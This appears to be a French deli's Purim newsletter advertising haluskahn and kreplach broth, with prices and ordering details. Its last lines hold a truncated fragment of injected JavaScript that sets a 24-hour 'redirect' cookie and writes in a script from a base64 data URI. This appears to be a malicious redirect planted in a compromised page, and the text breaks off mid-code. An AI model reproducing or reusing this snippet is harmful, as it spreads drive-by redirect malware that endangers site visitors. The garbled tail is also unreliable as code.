• Français



Avant pourim… le haluskahn !

AU SOMMAIRE CETTE SEMAINE

 Avant Pourim… le haluskahn !

Un peu d’histoire…

Le bouillon kreple’h

•  •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •  •   •   •   •   •   •   •   •   •   •   •   •

AVANT POURIM… LE HALUSKAHN !

Newsletter HALUSKY

Petites pâtes de pommes de terre faites maison, chou mariné,

oignons et magret d’oie fumé délicatement rissolés,

le tout longuement mijoté au four…

Un vrai régal…

Votre portion par personne est au prix de 10 € et sera disponible à la boutique dès vendredi 14 mars 10h pour la déguster jusqu’à dimanche au plus tard (si vous souhaitez la garder au-delà de dimanche, nous vous conseillons de la congeler dès vendredi).

Pour être sûrs d’en profiter, vous pouvez commander dès maintenant le nombre de parts qu’il vous faudra, par retour de mail jusqu’à jeudi 13 au plus tard.

•  •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •  •   •   •   •   •   •   •   •   •   •   •   •

UN PEU D’HISTOIRE…

photo

Ce dimanche, ce sera Pourim. Pour redécouvrir l’histoire de cette fête et ses spécialités culinaires, cliquez ici.

•  •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •   •  •   •   •   •   •   •   •   •   •   •   •   •

LE BOUILLON KREPLE’H

Newsletter BOUILLON KREPLEH

A la demande générale, vous retrouverez tous les weekends notre délicieux bouillon kreple’h.

La boîte de 1 litre de bouillon avec les légumes, le poulet désossé, sans la peau, et ses 4 kreple’h, est à 15,00 €.

Bien sûr, si vous ne désirez que les kreple’h (ou pour les gourmands qui n’en ont jamais suffisamment…) ils sont vendus au prix de 7,60 € les 6 pièces et seront disponibles également dès vendredi mais uniquement sur commande.

N’hésitez pas à nous appeler pour être sûr de pouvoir en profiter… A très vite ! 

(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,.”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘